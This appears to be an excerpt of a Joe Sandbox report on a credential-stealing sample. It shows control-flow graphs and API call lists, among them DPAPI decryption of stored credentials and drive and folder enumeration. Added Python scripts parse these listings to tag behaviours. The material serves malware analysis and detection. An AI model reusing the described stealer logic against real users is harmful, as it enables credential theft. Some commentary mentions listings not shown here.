• Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86

Control-flow Graph

control_flow_graph for function 419362 (basic-block graph rendered in the report, blocks 83-144; the blocks that call out, in address order):
419340-419349 call 407ee0
4193f8-419407 call 43d910
41940a-419465 call 401a50
4194d4-4194fb call 401d90
4195c9-4195eb call 401d90
419660-41967e call 407ed0
4196b2-4196fc call 41d140 * 2
4196fe-419719 call 41d140
419749-41975f call 41d140
419795-4197f4 call 43f450, CryptUnprotectData
APIs
  • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: CryptDataInitializeThunkUnprotect
• String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
• API String ID: 279577407-4262920783
• Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
• Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
• Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
• Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46
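The two APIs listings above (functions 438860 and 419362) are what an analyst triages by hand: the first is COM client set-up with BSTR query strings and a VARIANT result, which is the shape of a WMI query, and the second is the DPAPI call that decrypts browser-stored credential blobs. The Python below is an added example, not Joe Sandbox tooling and not code from the sample, that parses lines in the report's "API.MODULE(args), ref: ADDR" format, keeps "Part of subcall function" entries apart from direct calls, and tags behaviours from the API sets; the tag names are my own. It also checks CoSetProxyBlanket's arguments against the constants the documented IWbemServices client sequence passes (RPC_C_AUTHN_WINNT = 0xA, RPC_C_AUTHZ_NONE = 0, NULL principal, RPC_C_AUTHN_LEVEL_CALL = 3, RPC_C_IMP_LEVEL_IMPERSONATE = 3, NULL auth info, EOAC_NONE = 0), which the arguments printed for 00438B9D match exactly. The sample input is the two listings copied inline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the two "APIs" listings of this report, copied as printed
# and keyed by the function each belongs to (taken from its control-flow graph).
SAMPLE_API_LISTINGS = {
    "00438860": """
• CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
• SysAllocString.OLEAUT32(k2`0), ref: 00438B60
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
• SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
• SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
• VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
• VariantClear.OLEAUT32(?), ref: 00438E8F
• SysFreeString.OLEAUT32(?), ref: 00438EB3
• SysFreeString.OLEAUT32(?), ref: 00438EB9
• SysFreeString.OLEAUT32(00000000), ref: 00438EC6
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA
""",
    "00419362": """
  • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB
""",
}

_CALL = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                    # address of the call site
    via_subcall: Optional[str]  # callee address when the call only happens inside a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    """One ApiCall per line that carries the report's API.MODULE(args), ref: ADDR shape."""
    calls = []
    for line in text.splitlines():
        m = _CALL.search(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


# Values from rpcdce.h / objidl.h used by the documented IWbemServices client sequence
RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE = 0xA, 0
RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, EOAC_NONE = 3, 3, 0


def _hexarg(a: str) -> Optional[int]:
    try:
        return int(a, 16)
    except ValueError:
        return None   # "?" (unresolved) or a non-numeric argument


def is_wmi_proxy_blanket(call: ApiCall) -> bool:
    """CoSetProxyBlanket(proxy, WINNT, AUTHZ_NONE, NULL, LEVEL_CALL, IMPERSONATE, NULL, EOAC_NONE)."""
    if call.api != "CoSetProxyBlanket" or len(call.args) != 8:
        return False
    return [_hexarg(a) for a in call.args[1:]] == [
        RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, 0,
        RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, 0, EOAC_NONE,
    ]


# Behaviour tags (my naming); every API in a set must be called directly by the function
BEHAVIOR_RULES = {
    "wmi_query_via_com":   {"CoCreateInstance", "CoSetProxyBlanket", "SysAllocString", "VariantInit"},
    "dpapi_decrypt":       {"CryptUnprotectData"},
    "volume_info_query":   {"GetVolumeInformationW"},
    "clipboard_read":      {"OpenClipboard", "GetClipboardData"},
    "installed_ram_query": {"GetPhysicallyInstalledSystemMemory"},
}


def classify(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Tags whose API set is fully present; subcall-only APIs are ignored unless asked for."""
    present = {c.api for c in calls if include_subcalls or c.via_subcall is None}
    return sorted(tag for tag, needed in BEHAVIOR_RULES.items() if needed <= present)


def triage(listings: Dict[str, str]) -> Dict[str, dict]:
    """Per function: behaviour tags plus whether its CoSetProxyBlanket is the stock WMI one."""
    report = {}
    for func, text in listings.items():
        calls = parse_api_lines(text)
        report[func] = {
            "tags": classify(calls),
            "wmi_proxy_blanket": any(is_wmi_proxy_blanket(c) for c in calls),
        }
    return report


if __name__ == "__main__":
    for func, r in triage(SAMPLE_API_LISTINGS).items():
        print(func, r)
```

The argument check is the context a bare API name lacks: CoSetProxyBlanket with a packet-privacy authentication level or a non-NULL principal name is still COM, but it is not the stock WMI client sequence, and a rule keyed on names alone cannot tell the two apart. Keeping subcall entries separate matters for the same reason; LdrInitializeThunk at 0043D93E belongs to a shared helper, not to the credential-decryption routine.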

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 145 421060-4210a8 call 4409e0 148 4218a3-4218b3 145->148 149 4210ae-42110e call 4140f0 call 43bc90 145->149 154 421110-421113 149->154 155 421115-421189 154->155 156 42118b-42118f 154->156 155->154 157 421191-421197 156->157 158 4211a3-4211bc 157->158 159 421199-42119e 157->159 161 4211c3-4211ce 158->161 162 4211be 158->162 160 42125b-42125e 159->160 165 421262-421267 160->165 166 421260 160->166 163 42124a-42124f 161->163 164 4211d0-421240 call 43d910 161->164 162->163 168 421251-421254 163->168 169 421259 163->169 173 421245 164->173 170 42178d-4217c4 call 43bcb0 165->170 171 42126d-42127d 165->171 166->165 168->157 169->160 179 4217c6-4217c9 170->179 174 42127f-4212a1 171->174 173->163 176 4212a3 174->176 177 4212a8-4212c7 174->177 180 421467 176->180 178 4212c9-4212cc 177->178 181 4212f8-421316 call 4218c0 178->181 182 4212ce-4212f6 178->182 183 421841-421845 179->183 184 4217cb-42183f 179->184 185 42146b-42146e 180->185 181->180 197 42131c-421349 181->197 182->178 187 421847-42184d 183->187 184->179 188 421470-421474 185->188 189 421476-42148c call 43bc90 185->189 191 421851-421863 187->191 192 42184f 187->192 193 4214a4-4214a6 188->193 207 421490-42149b 189->207 208 42148e-4214a2 189->208 199 421867-42186d 191->199 200 421865 191->200 198 4218a1 192->198 195 421764-42176b 193->195 196 4214ac-4214cb 193->196 213 421777-42177b 195->213 214 42176d-421775 195->214 202 4214cd-4214d0 196->202 203 42134b-42134e 197->203 198->148 205 421895-421898 199->205 206 42186f-421891 call 43d910 199->206 200->205 209 4214d2-4214f8 202->209 210 4214fa-42153d 202->210 211 421393-4213ae call 4218c0 203->211 212 421350-421391 203->212 216 42189a-42189d 205->216 217 42189f 205->217 206->205 219 42177f-421783 207->219 208->193 209->202 220 42153f-421542 210->220 230 4213b0-4213b4 211->230 231 4213b9-4213d0 211->231 212->203 222 42177d 213->222 214->222 216->187 217->198 219->174 224 421789-42178b 219->224 225 421544-4215b8 220->225 226 4215ba-4215c0 220->226 222->219 224->170 225->220 229 4215c4-4215ca 226->229 232 4215d6-4215f8 229->232 233 4215cc-4215d1 229->233 230->185 234 4213d2 231->234 235 4213d4-421465 call 407ed0 call 413d60 call 407ee0 231->235 237 421601-421613 232->237 238 4215fa-4215fc 232->238 236 4216b5-4216b8 233->236 234->235 235->185 241 4216ba 236->241 242 4216bc-4216db 236->242 243 42169d-4216a9 237->243 244 421619-421693 call 43d910 237->244 238->243 241->242 248 4216dd-4216e0 242->248 246 4216b3 243->246 247 4216ab-4216ae 243->247 253 421698 244->253 246->236 247->229 251 4216e2-4216f7 248->251 252 4216f9-4216ff 248->252 251->248 254 421701-421705 252->254 255 421735-421738 252->255 253->243 259 421707-42170e 254->259 256 42173a-42174b call 43bcb0 255->256 257 42174d-421753 255->257 261 421755-421758 256->261 257->261 263 421710-42171c 259->263 264 42171e-421727 259->264 261->195 266 42175a-421762 261->266 263->259 268 42172b 264->268 269 421729 264->269 266->219 270 421731-421733 268->270 269->270 270->255
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeapInitializeThunk
• String ID: !@$,$0$1$=$?$@$B$T$V$W
• API String ID: 383220839-2565976686
• Opcode ID: 694c3fec6f08d54430612453bc0ba53508c55e5cebad724f7ac0ec954b199606
• Instruction ID: bd3356e8815184d6709652c26fefee66f72d067b08eb61c2d628a82e36adc5dc
• Opcode Fuzzy Hash: 694c3fec6f08d54430612453bc0ba53508c55e5cebad724f7ac0ec954b199606
• Instruction Fuzzy Hash: 3D32E27160C7908FD324CB28D4803AFBBE2ABE5314F58896EE5D5873A1D6B98845CB47

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 271 40ad90-40ae18 272 40ae20-40ae29 271->272 272->272 273 40ae2b-40ae3e 272->273 275 40b0c0-40b0c4 273->275 276 40b1a1-40b1aa 273->276 277 40b1b1-40b1b8 273->277 278 40ae45-40ae47 273->278 279 40b0c9-40b167 call 407db0 273->279 280 40ae4c-40b073 273->280 281 40b1bd-40b1cb 273->281 282 40b16e-40b175 273->282 284 40b49e-40b4aa 275->284 276->277 276->281 290 40b3c0-40b3d4 276->290 291 40b481 276->291 292 40b349-40b350 276->292 293 40b30c 276->293 294 40b38d-40b394 276->294 295 40b2d0 276->295 296 40b330-40b33c 276->296 297 40b370-40b379 276->297 298 40b450 276->298 299 40b470 276->299 300 40b472-40b475 276->300 301 40b3f4-40b417 call 43d880 276->301 302 40b315-40b328 276->302 303 40b456 276->303 304 40b357 276->304 305 40b47c 276->305 306 40b35d-40b366 276->306 307 40b41e-40b446 276->307 308 40b37f-40b386 276->308 309 40b25f-40b27b 277->309 288 40b4ad-40b4b4 278->288 279->276 279->277 279->281 279->282 279->290 279->291 279->292 279->293 279->294 279->295 279->296 279->297 279->298 279->299 279->300 279->301 279->302 279->303 279->304 279->305 279->306 279->307 279->308 289 40b080-40b0a2 280->289 283 40b1d0-40b253 281->283 286 40b193-40b19c 282->286 287 40b17c-40b191 call 43f450 282->287 283->283 310 40b259-40b25c 283->310 284->288 322 40b494-40b49b 286->322 287->286 289->289 317 40b0a4-40b0af 289->317 326 40b3db-40b3ed 290->326 328 40b488-40b48b 291->328 292->290 292->291 292->294 292->297 292->298 292->299 292->300 292->301 292->303 292->304 292->305 292->306 292->307 292->308 293->302 294->286 294->287 294->295 312 40b3b2-40b3bb 294->312 313 40b2d6-40b2e0 294->313 314 40b2e7-40b2fc call 43f450 294->314 315 40b39b-40b3b0 call 43f450 294->315 316 40b2fe-40b307 294->316 331 40b343 296->331 297->308 300->291 300->305 301->291 301->298 301->299 301->300 301->303 301->305 301->307 302->296 320 40b45b-40b461 303->320 305->291 306->297 307->320 308->290 308->291 308->294 308->298 308->299 308->300 308->301 308->303 308->305 308->307 311 40b280-40b2a6 309->311 310->309 311->311 323 40b2a8-40b2c4 311->323 312->291 313->286 313->287 313->314 313->316 314->316 315->312 316->328 337 40b0b2-40b0b9 317->337 320->299 322->284 323->290 323->291 323->292 323->293 323->294 323->295 323->296 323->297 323->298 323->299 323->300 323->301 323->302 323->303 323->304 323->305 323->306 323->307 323->308 326->291 326->298 326->299 326->300 326->301 326->303 326->305 326->307 328->322 331->292 337->275 337->276 337->277 337->279 337->281 337->282 337->290 337->291 337->292 337->293 337->294 337->295 337->296 337->297 337->298 337->299 337->300 337->301 337->302 337->303 337->304 337->305 337->306 337->307 337->308
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: FuD$:8$'J*H$7V>T$I.Q,$^*^($cfgd$fRnP$n^d\$oZdX$uBc@
• API String ID: 0-4178537825
• Opcode ID: 0ab402fb4809c95dc4027289a1b8894fb3f44387b0cf046cf4c9e6df90fd333a
• Instruction ID: bcbedf8eb0a07792cc22a0f8fb5d0594b8c224fc694cc013ea00b116edda161a
• Opcode Fuzzy Hash: 0ab402fb4809c95dc4027289a1b8894fb3f44387b0cf046cf4c9e6df90fd333a
• Instruction Fuzzy Hash: 0002AAB5200B00CFD3248F69D891797BBF5FB45314F058A2DE5AA8BBA0C7B8A415CF95

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 344 4229cd-4229d9 345 4229e0-4229fd 344->345 346 422a10-422a1f 344->346 347 422ad0 344->347 348 422a40-422a4e 344->348 349 422ad6-422ae6 344->349 350 422a26-422a39 344->350 351 422a6f-422a7f 344->351 345->346 345->347 345->348 345->349 345->350 345->351 346->346 346->347 346->348 346->350 346->351 348->346 348->351 357 422a60-422a68 348->357 352 422b40 349->352 353 422e31-422e63 call 40a600 349->353 354 422e6a-422e7d 349->354 355 422b58-422b74 349->355 356 422aed-422b2c call 43f450 * 2 349->356 350->346 350->347 350->348 350->351 351->347 351->349 351->352 351->353 351->355 351->356 351->357 358 422aa0-422aab 351->358 359 422ac0 351->359 360 422a86-422a99 351->360 361 422aae-422ab4 351->361 390 422b48-422b51 352->390 353->354 363 422eb2-422eb7 353->363 364 422e90-422eab 353->364 365 422ee5-422ef7 353->365 366 422ebe-422ede 353->366 394 422f00-422f12 353->394 354->363 354->364 354->365 354->366 367 422be2-422bea 355->367 368 422bc0 355->368 369 422b80-422b8a 355->369 370 422c60-422c68 355->370 371 422dc0-422dd2 355->371 372 422c24-422c57 355->372 373 422d89-422d95 355->373 374 422bd0-422bd8 355->374 375 422c10-422c1d 355->375 376 422c70-422c79 355->376 377 422b91-422bb9 355->377 378 422bf7-422c07 355->378 379 422dd9-422de8 355->379 380 422d9c-422db0 355->380 356->352 356->353 356->354 356->363 356->364 356->365 356->366 356->394 357->346 357->351 358->361 359->347 360->347 360->349 360->352 360->353 360->354 360->355 360->356 360->357 360->358 360->359 360->361 361->359 363->364 363->366 364->363 364->365 364->366 365->352 365->390 393 422e22-422e2a 365->393 365->394 366->363 366->364 366->365 367->378 368->374 369->367 369->368 369->369 369->370 369->371 369->372 369->373 369->374 369->375 369->376 369->377 369->378 369->379 369->380 392 422c7d-422c8a 370->392 371->379 383 423022-42302c 371->383 384 423020 371->384 385 423120-423187 371->385 386 423001-423013 371->386 387 422def-422df6 371->387 388 423016-42301f 371->388 389 422dff-422e09 371->389 372->370 373->367 373->368 373->369 373->370 373->371 373->372 373->374 373->375 373->376 373->378 373->379 373->380 373->383 373->384 373->385 373->386 373->387 373->388 373->389 374->367 375->369 375->370 375->371 375->372 375->376 375->379 376->392 377->367 377->368 377->369 377->370 377->371 377->372 377->374 377->375 377->376 377->378 377->379 378->369 378->370 378->371 378->372 378->375 378->376 378->379 379->383 379->384 379->385 379->386 379->387 379->388 379->389 380->371 380->379 380->383 380->384 380->385 380->386 380->387 380->388 380->389 397 423190-4231be 385->397 386->388 387->389 388->384 389->388 390->352 390->355 390->365 390->390 390->393 399 422c90-422cfe 392->399 393->352 393->353 393->354 393->363 393->364 393->365 393->366 393->394 401 422f20-422f8a 394->401 397->397 405 4231c0-423208 RtlExpandEnvironmentStrings 397->405 399->399 407 422d00-422d10 399->407 401->401 408 422f8c-422f97 401->408 409 423210-42325f 405->409 407->369 410 422d16-422d25 407->410 411 422e10-422e1b 408->411 412 422f9d-422fa9 408->412 409->409 414 423261-42326e 409->414 415 422d30-422d37 410->415 411->352 411->390 411->393 413 422fb0-422fb7 412->413 416 422fc3-422fc9 413->416 417 422fb9-422fbc 413->417 418 4232d2-4232db 414->418 419 4235e1-42366e 414->419 420 4235c6 414->420 421 4235b6-4235be 414->421 422 4232b4 414->422 423 423275-4232ad call 407ed0 RtlExpandEnvironmentStrings 414->423 424 4232c5-4232ca 414->424 425 423448-4234f4 call 407ed0 414->425 426 42342f-423441 414->426 427 4232dc-42332b call 407ed0 414->427 428 4232bc-4232c2 call 407ee0 414->428 429 422d43-422d49 415->429 430 422d39-422d3c 415->430 416->411 433 422fcf-422ff6 call 43d910 416->433 417->413 432 422fbe 417->432 434 423670-423684 419->434 421->420 422->428 423->419 423->420 423->421 423->422 423->424 423->425 423->426 423->427 423->428 437 4232d0 424->437 472 423500-423536 425->472 426->418 426->419 426->420 426->421 426->424 426->425 426->428 435 4236a4-4236bb 426->435 436 4235cc-4235d2 call 407ee0 426->436 426->437 438 4237b4 426->438 439 4237ba-4237c2 call 407ee0 426->439 440 4235db 426->440 470 423330-4233ad 427->470 428->424 429->369 445 422d4f-422d82 call 43d910 429->445 430->415 444 422d3e 430->444 432->411 433->386 434->434 449 423686-423694 call 421060 434->449 450 4236c0-4236fc 435->450 436->440 444->369 445->367 445->368 445->369 445->370 445->371 445->372 445->373 445->374 445->375 445->376 445->377 445->378 445->379 445->380 445->383 445->384 445->385 445->386 445->387 445->388 445->389 466 423699-42369c 449->466 450->450 461 4236fe-423771 450->461 467 423780-423790 461->467 466->435 467->467 471 423792-4237ab call 420c30 467->471 470->470 473 4233af-4233bd 470->473 471->438 472->472 475 423538-423543 472->475 476 4233e1-4233f0 473->476 477 4233bf-4233c4 473->477 479 423561-42356f 475->479 480 423545-42354f 475->480 482 4233f2-4233f5 476->482 483 423411-42341b call 440ba0 476->483 481 4233d0-4233df 477->481 485 423591-4235af GetLogicalDrives call 440ba0 479->485 486 423571-423574 479->486 484 423550-42355f 480->484 481->476 481->481 487 423400-42340f 482->487 491 423420-423428 483->491 484->479 484->484 485->418 485->420 485->421 485->424 485->428 485->435 485->436 485->437 485->438 485->439 485->440 489 423580-42358f 486->489 487->483 487->487 489->485 489->489 491->418 491->419 491->420 491->421 491->424 491->425 491->426 491->428 491->435 491->436 491->437 491->438 491->439 491->440
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: "0B$7x~$`*B
• API String ID: 0-767839351
• Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
• Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
• Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
• Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 493 4095a0-4095ae 494 4095b4-40961f call 405da0 call 407ed0 493->494 495 409985 493->495 501 409620-409645 494->501 497 409987-409993 495->497 501->501 502 409647-409663 call 408ef0 501->502 505 409670-409684 502->505 505->505 506 409686-4096a3 call 408ef0 505->506 509 4096b0-4096c4 506->509 509->509 510 4096c6-4096ef call 408ef0 509->510 513 4096f0-40971d 510->513 513->513 514 40971f-409729 513->514 515 409730-409771 514->515 515->515 516 409773-40978e call 408ef0 515->516 519 409790-4097a4 516->519 519->519 520 4097a6-40986e call 409140 519->520 523 409870-409895 520->523 523->523 524 409897-40989f 523->524 525 4098c1-4098cc 524->525 526 4098a1-4098a9 524->526 528 4098f1-40991f 525->528 529 4098ce-4098d1 525->529 527 4098b0-4098bf 526->527 527->525 527->527 531 409920-409946 528->531 530 4098e0-4098ef 529->530 530->528 530->530 531->531 532 409948-40995d call 40bf40 531->532 534 409962-409983 call 407ee0 532->534 534->497
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 8A6CA42990BFD5D420A4C476FD51BCB1$96$ec$fg$m$t{$T
• API String ID: 0-115365862
• Opcode ID: 4f28de017bae56af272f2ebb78918ce2254d3fc1898780eaaedbce328d025c84
• Instruction ID: 04ace9e08cfa33f9ed2207d002dc48eeb8774e5e1fc40806eeb0b6624e25d2eb
• Opcode Fuzzy Hash: 4f28de017bae56af272f2ebb78918ce2254d3fc1898780eaaedbce328d025c84
• Instruction Fuzzy Hash: 41A1E5B01083808BD714DF65C895AABBBE5EBC2318F14896DE0D1DB392D739C909CB56

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 537 408640-408651 call 43d0a0 540 4088e6-4088e8 ExitProcess 537->540 541 408657-40865e call 4354a0 537->541 544 4088e1 call 43d860 541->544 545 408664-40868a GetCurrentProcessId GetCurrentThreadId 541->545 544->540 546 408690-40876a SHGetSpecialFolderPathW 545->546 547 40868c-40868e 545->547 549 408770-40878c 546->549 547->546 549->549 550 40878e-4087bf call 43bc90 549->550 553 4087c0-4087dc 550->553 554 4087f6-40880b GetForegroundWindow 553->554 555 4087de-4087f4 553->555 556 408811-408832 554->556 557 4088ab-4088c3 call 4099e0 554->557 555->553 559 408834-408836 556->559 560 408838-4088a9 556->560 562 4088c5 call 40c660 557->562 563 4088cf-4088d6 557->563 559->560 560->557 566 4088ca call 40b4c0 562->566 563->544 565 4088d8-4088de call 407ee0 563->565 565->544 566->563
APIs
• GetCurrentProcessId.KERNEL32 ref: 00408664
• GetCurrentThreadId.KERNEL32 ref: 0040866E
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
• GetForegroundWindow.USER32 ref: 00408803
• ExitProcess.KERNEL32 ref: 004088E8
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0
• Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                                                                                                                                            • Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789
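The control_flow_graph line above is the Joe Sandbox IDA plugin's textual dump of this function's basic blocks and edges. The Python below is added here as an editor's worked example; it is not part of the Joe Sandbox report or of the plugin. It parses that dump into blocks and edges and answers the questions an analyst usually has when reading one: which blocks invoke which Windows APIs, which block is the entry, which block has no successor, and which block ids are reached. The grammar it assumes (decimal block id, hex address or address range, `call <target>` annotations, bare API names, `a->b` edges) is inferred from the lines on this page, not from a published specification; the embedded sample is the line for the function at 0x408640 copied from this report. The same parser applies unchanged to the GetPhysicallyInstalledSystemMemory functions dumped further down.

```python
import re
from collections import defaultdict

# Constructed sample: the control_flow_graph dump for the 0x408640 function,
# copied from this report so the example runs offline.
SAMPLE_CFG = """control_flow_graph 537 408640-408651 call 43d0a0 540 4088e6-4088e8 ExitProcess
537->540 541 408657-40865e call 4354a0 537->541 544 4088e1 call 43d860 541->544
545 408664-40868a GetCurrentProcessId GetCurrentThreadId 541->545 544->540
546 408690-40876a SHGetSpecialFolderPathW 545->546 547 40868c-40868e 545->547
549 408770-40878c 546->549 547->546 549->549 550 40878e-4087bf call 43bc90 549->550
553 4087c0-4087dc 550->553 554 4087f6-40880b GetForegroundWindow 553->554
555 4087de-4087f4 553->555 556 408811-408832 554->556 557 4088ab-4088c3 call 4099e0
554->557 555->553 559 408834-408836 556->559 560 408838-4088a9 556->560
562 4088c5 call 40c660 557->562 563 4088cf-4088d6 557->563 559->560 560->557
566 4088ca call 40b4c0 562->566 563->544 565 4088d8-4088de call 407ee0 563->565
565->544 566->563"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")            # "537->540"
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # "4088e1" or "408640-408651"
ID_RE = re.compile(r"^\d+$")                        # decimal block id


def parse_cfg(text):
    """Return (blocks, edges). blocks: id -> {start, end, apis, calls}; edges: [(src, dst)].

    Assumed grammar (inferred from the report): '<id> <start>[-<end>]' opens a block,
    'call <hex>' and bare API names annotate the most recently opened block,
    '<a>-><b>' is a control-flow edge. Anything else raises.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok == "call":
            if current is None or i + 1 >= len(tokens):
                raise ValueError("dangling 'call' at token %d" % i)
            blocks[current]["calls"].append(tokens[i + 1])   # internal call target
            i += 2
        elif ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")
            current = int(tok)
            blocks[current] = {"start": int(start, 16), "end": int(end or start, 16),
                               "apis": [], "calls": []}
            i += 2
        elif current is None:
            raise ValueError("annotation %r before any block" % tok)
        else:
            blocks[current]["apis"].append(tok)               # imported API name
            i += 1
    return blocks, edges


def api_blocks(blocks):
    """Map each Windows API name to the ids of the blocks that invoke it."""
    out = defaultdict(list)
    for bid, b in blocks.items():
        for api in b["apis"]:
            out[api].append(bid)
    return dict(out)


def entry_and_exit_blocks(blocks, edges):
    """Blocks with no predecessor (entries) and blocks with no successor (exits)."""
    has_pred = {dst for _, dst in edges}
    has_succ = {src for src, _ in edges}
    return (sorted(b for b in blocks if b not in has_pred),
            sorted(b for b in blocks if b not in has_succ))


def reachable(edges, start):
    """Set of block ids reachable from start by following edges (start included)."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(succ[n])
    return seen


def summarize(text):
    """One-shot summary of a control_flow_graph dump for triage."""
    blocks, edges = parse_cfg(text)
    entries, exits = entry_and_exit_blocks(blocks, edges)
    return {"blocks": len(blocks), "edges": len(edges), "entries": entries,
            "exits": exits, "apis": api_blocks(blocks),
            "internal_calls": sorted(t for b in blocks.values() for t in b["calls"]),
            "self_loops": sorted(s for s, d in edges if s == d)}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_CFG).items():
        print(key, value)
```

On this dump the parser finds a single entry block (537) and a single block with no successor (540, the one that calls ExitProcess), so every path through the function terminates the process; block 549 is the only self-loop, which is consistent with a tight copy or decryption loop before the call into 0x43bc90. The SHGetSpecialFolderPathW call in block 546 is listed above with nFolder 0x10, which is CSIDL_DESKTOPDIRECTORY, i.e. the user's Desktop folder.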

                                                                                                                                                                                                            Control-flow Graph

